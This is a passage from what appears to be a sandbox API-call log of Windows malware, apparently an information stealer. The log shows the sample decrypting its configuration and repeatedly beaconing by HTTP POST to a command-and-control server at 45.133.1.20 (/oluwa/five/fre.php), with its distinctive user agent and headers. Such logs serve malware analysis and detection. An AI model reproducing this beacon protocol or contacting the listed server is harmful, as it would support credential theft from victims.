(lpLibFileName="ADVAPI32") returned 0x74810000 [0160.564] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b9b78, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0160.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.566] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0160.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.567] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.567] GetProcessHeap () returned 0x6a0000 [0160.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b78 | out: hHeap=0x6a0000) returned 1 [0160.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.569] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0160.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.571] CryptDestroyKey (hKey=0x6ad020) returned 1 [0160.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.572] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0160.572] GetProcessHeap () returned 0x6a0000 [0160.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0160.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.574] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0160.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.575] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0160.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.576] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0160.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.578] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0160.578] GetProcessHeap () returned 0x6a0000 [0160.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0160.578] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0160.578] GetProcessHeap () returned 0x6a0000 [0160.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0160.579] GetProcessHeap () returned 0x6a0000 [0160.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0160.579] GetProcessHeap () returned 0x6a0000 [0160.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0160.580] GetProcessHeap () returned 0x6a0000 [0160.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0160.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.594] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0160.603] GetProcessHeap () returned 0x6a0000 [0160.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0160.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.605] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0160.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.606] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0160.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.607] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.607] GetProcessHeap () returned 0x6a0000 [0160.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0160.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.609] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0160.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.610] CryptDestroyKey (hKey=0x6ad520) returned 1 [0160.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.612] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0160.612] GetProcessHeap () returned 0x6a0000 [0160.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0160.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.614] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0160.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.615] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0160.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.616] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0160.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.617] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0160.618] GetProcessHeap () returned 0x6a0000 [0160.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0160.618] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0160.618] GetProcessHeap () returned 0x6a0000 [0160.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0160.618] socket (af=2, type=1, protocol=6) returned 0x2ac [0160.618] connect (s=0x2ac, name=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0160.650] FreeAddrInfoW (pAddrInfo=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0160.650] GetProcessHeap () returned 0x6a0000 [0160.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0160.651] GetProcessHeap () returned 0x6a0000 [0160.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0160.652] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.652] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0160.653] GetProcessHeap () returned 0x6a0000 [0160.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0160.653] GetProcessHeap () returned 0x6a0000 [0160.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.654] GetProcessHeap () returned 0x6a0000 [0160.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0160.654] GetProcessHeap () returned 0x6a0000 [0160.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0160.654] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.655] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0160.655] GetProcessHeap () returned 0x6a0000 [0160.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0160.655] GetProcessHeap () returned 0x6a0000 [0160.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.656] send (s=0x2ac, buf=0x6bbd20*, len=242, flags=0) returned 242 [0160.657] send (s=0x2ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0160.657] GetProcessHeap () returned 0x6a0000 [0160.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0160.657] recv (in: s=0x2ac, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0160.728] GetProcessHeap () returned 0x6a0000 [0160.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0160.728] GetProcessHeap () returned 0x6a0000 [0160.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0160.729] GetProcessHeap () returned 0x6a0000 [0160.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0160.729] GetProcessHeap () returned 0x6a0000 [0160.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0160.729] closesocket (s=0x2ac) returned 0 [0160.730] GetProcessHeap () returned 0x6a0000 [0160.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0160.730] GetProcessHeap () returned 0x6a0000 [0160.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0160.730] GetProcessHeap () returned 0x6a0000 [0160.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0160.731] GetProcessHeap () returned 0x6a0000 [0160.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0160.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe60) returned 0x2ac [0160.733] Sleep (dwMilliseconds=0xea60) [0160.734] GetProcessHeap () returned 0x6a0000 [0160.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0160.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.741] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0160.748] GetProcessHeap () returned 0x6a0000 [0160.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0160.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.749] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0160.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.750] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0160.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.751] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.751] GetProcessHeap () returned 0x6a0000 [0160.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0160.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.759] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0160.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.760] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0160.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.760] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0160.761] GetProcessHeap () returned 0x6a0000 [0160.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0160.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.761] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0160.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.762] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0160.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.763] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0160.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.764] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0160.764] GetProcessHeap () returned 0x6a0000 [0160.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0160.765] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0160.765] GetProcessHeap () returned 0x6a0000 [0160.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0160.765] GetProcessHeap () returned 0x6a0000 [0160.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0160.765] GetProcessHeap () returned 0x6a0000 [0160.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0160.766] GetProcessHeap () returned 0x6a0000 [0160.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0160.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.773] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0160.780] GetProcessHeap () returned 0x6a0000 [0160.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0160.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.781] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0160.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.782] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0160.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.783] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.783] GetProcessHeap () returned 0x6a0000 [0160.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0160.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.786] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0160.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.788] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0160.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.789] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0160.789] GetProcessHeap () returned 0x6a0000 [0160.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0160.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.790] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0160.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.791] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0160.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.791] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0160.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.792] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0160.792] GetProcessHeap () returned 0x6a0000 [0160.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0160.793] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0160.793] GetProcessHeap () returned 0x6a0000 [0160.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0160.793] socket (af=2, type=1, protocol=6) returned 0x2b0 [0160.793] connect (s=0x2b0, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0160.820] FreeAddrInfoW (pAddrInfo=0x6b9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0160.820] GetProcessHeap () returned 0x6a0000 [0160.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0160.820] GetProcessHeap () returned 0x6a0000 [0160.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0160.821] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.835] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0160.835] GetProcessHeap () returned 0x6a0000 [0160.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0160.836] GetProcessHeap () returned 0x6a0000 [0160.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.836] GetProcessHeap () returned 0x6a0000 [0160.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0160.836] GetProcessHeap () returned 0x6a0000 [0160.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0160.837] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.838] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0160.838] GetProcessHeap () returned 0x6a0000 [0160.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0160.838] GetProcessHeap () returned 0x6a0000 [0160.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.839] send (s=0x2b0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0160.839] send (s=0x2b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0160.839] GetProcessHeap () returned 0x6a0000 [0160.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0160.840] recv (in: s=0x2b0, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0160.927] GetProcessHeap () returned 0x6a0000 [0160.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0160.928] GetProcessHeap () returned 0x6a0000 [0160.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0160.929] GetProcessHeap () returned 0x6a0000 [0160.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0160.929] GetProcessHeap () returned 0x6a0000 [0160.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0160.930] closesocket (s=0x2b0) returned 0 [0160.930] GetProcessHeap () returned 0x6a0000 [0160.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0160.930] GetProcessHeap () returned 0x6a0000 [0160.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0160.931] GetProcessHeap () returned 0x6a0000 [0160.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0160.931] GetProcessHeap () returned 0x6a0000 [0160.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0160.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1318) returned 0x2b0 [0160.934] Sleep (dwMilliseconds=0xea60) [0160.938] GetProcessHeap () returned 0x6a0000 [0160.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0160.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.939] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0161.040] GetProcessHeap () returned 0x6a0000 [0161.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9e18 [0161.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.041] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b9e18, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0161.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.042] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.043] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.043] GetProcessHeap () returned 0x6a0000 [0161.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e18 | out: hHeap=0x6a0000) returned 1 [0161.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.045] 